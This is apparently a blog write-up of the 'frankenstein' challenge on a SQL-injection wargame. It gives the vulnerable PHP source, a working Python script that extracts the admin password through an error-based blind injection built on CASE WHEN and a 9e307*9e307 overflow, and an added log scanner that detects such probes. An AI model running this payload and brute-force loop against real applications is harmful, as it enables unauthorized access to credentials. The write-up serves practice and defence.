웹찢남


frankenstein-writeup

harry595 2020. 1. 29. 22:15

<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  // Blacklist: prob, _, ., (, ), and union are rejected (case-insensitive), nothing else.
  if(preg_match('/prob|_|\.|\(|\)|union/i', $_GET[pw])) exit("No Hack ~_~");
  $query = "select id,pw from prob_frankenstein where id='frankenstein' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  // The only feedback the page gives: the literal string "error" when the query fails.
  if(mysqli_error($db)) exit("error");

  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_frankenstein where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("frankenstein");
  highlight_file(__FILE__);
?>

Looking at if(mysqli_error($db)) exit("error");, we can tell this is an error-based blind SQL injection: the page reveals nothing about the query except whether it raised an error.

The challenge filters (), though, so neither if nor coalesce (as used last time) can be used here.

After some digging, a CASE WHEN ... THEN ... END expression works instead, since it needs no parentheses. Multiplying 9e307*9e307 overflows MySQL's DOUBLE range and raises an error, so the query errors exactly when the WHEN condition is true.


import re
import requests
import time

flag = ''
# Candidate characters for the password, tried in this order for each position.
a = 'qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
session = dict(PHPSESSID="자신의 PHPSESSID")  # replace with your own PHPSESSID
for i in range(1, 20):
    for j in a:
        # CASE WHEN ... THEN 9e307*9e307 forces a DOUBLE overflow error only when the prefix matches.
        r = requests.post("https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php?pw=1' or id='admin' and case when pw like '" + flag + str(j) + "%' then 9e307*9e307 else 0 end -- ", cookies=session)
        # The page prints "error" only when the query failed, i.e. the guessed prefix is right.
        if 'error' in r.text:
            flag = flag + j
            print("finding pw: " + flag)
            break
print("pw " + flag)
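On the defending side, the same bypass is easy to spot in access logs. The following is an added example (not part of the original writeup or the challenge site): it URL-decodes the pw parameter from constructed combined-format log lines and flags requests that pass the challenge's blacklist yet carry a CASE WHEN ... END oracle or the 9e307*9e307 overflow trick. The log format and the detection regexes are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The challenge's own blacklist: blocks prob, _, ., (, ) and union, but not CASE/WHEN.
CHALLENGE_FILTER = re.compile(r'prob|_|\.|\(|\)|union', re.I)

# Patterns the blacklist misses (heuristics chosen for this example): a
# CASE...WHEN...THEN...END conditional and the 9e307*9e307 DOUBLE-overflow error trigger.
CASE_WHEN = re.compile(r'\bcase\s+when\b.*?\bthen\b.*?\bend\b', re.I | re.S)
DOUBLE_OVERFLOW = re.compile(r'\b9e307\s*\*\s*9e307\b', re.I)

def pw_param(request_target: str) -> str:
    """Return the URL-decoded pw parameter of a request target, or '' if absent."""
    qs = urlsplit(request_target).query
    return parse_qs(qs, keep_blank_values=True).get('pw', [''])[0]

def classify(pw: str) -> dict:
    """Describe a pw value: does it slip past the blacklist, and which oracle tricks does it use?"""
    return {
        'passes_blacklist': not CHALLENGE_FILTER.search(pw),
        'case_when': bool(CASE_WHEN.search(pw)),
        'double_overflow': bool(DOUBLE_OVERFLOW.search(pw)),
    }

def scan_log(lines):
    """Return (request_target, pw, verdict) for log lines whose pw looks like a blind-SQLi probe."""
    # Minimal combined-log parser: only the request target is needed (constructed format).
    req_re = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
    hits = []
    for line in lines:
        m = req_re.search(line)
        if not m:
            continue
        pw = pw_param(m.group(1))
        v = classify(pw)
        if v['case_when'] or v['double_overflow']:
            hits.append((m.group(1), pw, v))
    return hits

# Constructed sample log lines (not real traffic): one benign login, one probe like the script above.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Jan/2020:22:15:01 +0900] "GET /chall/frankenstein.php?pw=hunter2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [29/Jan/2020:22:15:07 +0900] "POST /chall/frankenstein.php?pw=1%27%20or%20id%3D%27admin%27%20and%20case%20when%20pw%20like%20%27a%25%27%20then%209e307*9e307%20else%200%20end%20--%20 HTTP/1.1" 200 498',
]

if __name__ == '__main__':
    for target, pw, verdict in scan_log(SAMPLE_LOG):
        print(pw, verdict)
```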

CLEAR!!!
